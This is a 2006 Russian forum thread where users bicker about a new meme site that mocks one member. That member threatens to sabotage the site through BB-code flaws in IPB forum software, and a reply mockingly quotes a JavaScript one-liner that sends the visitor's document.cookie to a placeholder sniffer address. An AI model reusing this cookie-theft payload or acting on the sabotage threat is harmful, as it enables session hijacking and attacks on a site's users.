Гигантская Флудилка

Объявление



Гигантская ФЛУДИЛКА!!!!! -- это форум на котором вы можете обсудить с профессионалами кино, музыку, компьютеры. Или просто поболтать. В разделе "Кино" у нас часто бывают ребята из "Ералаша", и те кто снимался в "Кадетстве", в музыку заходит московская SKA группа, а так же другие профессиональные музыканты. В "Компьютеры и интернет у нас заходят профессиональные программисты и web-дизайнеры. В "Курилке" нет запретных тем, и всегда много народу. Короче все к нам! Гигантская ФЛУДИЛКА!!!!!

sms.копилка

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Гигантская Флудилка » Курилка » Сайд


Сайд

Сообщений 1 страница 26 из 26

1

Создали сайт подобный wwwyaplakal.com на этом сайте мы прорекламировали Андрея и его сайт.Вот он -- На нем можно пофлудить, потусить, выложишь фотожабы ну и все что вашей душе угодно!Дрон сайт не про стеб над тобой, так что не бань и не закрывай тему.

Отредактировано AZETON (2006-11-28 22:01:25)

0

2

угу +1

0

3

AZETON написал(а):

Создали сайт подобный wwwyaplakal.com на этом сайте мы прорекламировали Андрея и его сайт.Вот он -- На нем можно пофлудить, потусить, выложишь фотожабы ну и все что вашей душе угодно!Дрон сайт не про стеб над тобой, так что не бань и не закрывай тему.

Что??? Я плакал рядом не валялся!!! С вашим творением!! И если не про стеб, то уберите жабы с главной, а зусуньте их куда в отдельную тему! В принципе большинство из них не обидны, но делать из этого непонятно что ненадо

0

4

Вообщем сайд хороший ) мы его раскручиваем )

0

5

AZETON написал(а):

Вообщем сайд хороший ) мы его раскручиваем )

Серьезно говорю, с жабами какого-то пацана на главной далеко не раскрутите

0

6

С таким петросяном как ты легко раскрутить:D:D:D

0

7

омг... андрей сжог мою подпись :D:D:D:D:D:D

0

8

Shoxy написал(а):

С таким петросяном как ты легко раскрутить

Если у тебя на сайте тока один чел и все ему посвященно, то сложно!

0

9

Ну мы же тебя любим....

0

10

Shoxy написал(а):

Ну мы же тебя любим....

Но к сожалению, кроме вас и моего ван клуба меня никто не любит... И потом даже если полюбит, то не надолго. На сайте должно быть разнообразие!

0

11

Хорошо! Мы так и сделаем :D

0

12

Shoxy написал(а):

Мы так и сделаем

Скорее всего вы сделаете много разнообразных жаб с МОИМ участием

0

13

Дрон, у нас за сегодня больше народу зарегилось чем у тебя за неделю

0

14

скажи ка еще раз сайт
:)

0

15

evsikoff написал(а):

Скорее всего вы сделаете много разнообразных жаб с МОИМ участием

эх...известность известность... :rolleyes:

0

16

скажи ка еще раз сайт

скажи

0

17

Amica написал(а):

скажи

Непомню уже....

0

18

мне лично даже не интересно всякую ерунду смотреть

0

19

Из-за того, что Шокси выложил обидную жабу я больше не буду заходить на ваш сайт, а буду просто иногда сбрасывать скрипты тормозящие его работу. Вы мне скажете, что не обладаю правами админа я не смогу сбрасывать скрипты, но в ИПБ есть програмные дыры связанные с ББ кодом. Он не всегда правильно преобразуется в ХТМЛ, что заставляет форум тормозить.

0

20

ЖЖошь Дрон... мы сеня уже увидели в тебе кулхацкера :lol: :lol:

javascript: document.body.background="http://адрес_сниффера/sniffer.cgi?"+document.cookie; document.embeds[0].style.display="none";this.avi

ЖГУН! :D

0

21

Я - секс символ Чукотки! написал(а):

ЖЖошь Дрон... мы сеня уже увидели в тебе кулхацкера

Это форум у тя гавно! Нельзя видео выложить!!!!

0

22

поздравляю

0

23

Дрон ты жжошь снова.... ты видел хоть на одном форуме, где можно выкладывать видео напрямую? :lol:

0

24

Кста... а как на ЯПе выкладывают прям в тему мувик?

0

25

Я - секс символ Чукотки! написал(а):

Дрон ты жжошь снова.... ты видел хоть на одном форуме, где можно выкладывать видео напрямую?

Мейл -Ответы

0

26

AZETON написал(а):

Кста... а как на ЯПе выкладывают прям в тему мувик?

На япе если и выкладывают мувики прямо в тему, то это ссылка на какой нить youtube.com например , а на youtube.com все мувики в формате .flv , т.e flash video , такое и у нас мона замутить.

0

Похожие темы


Вы здесь » Гигантская Флудилка » Курилка » Сайд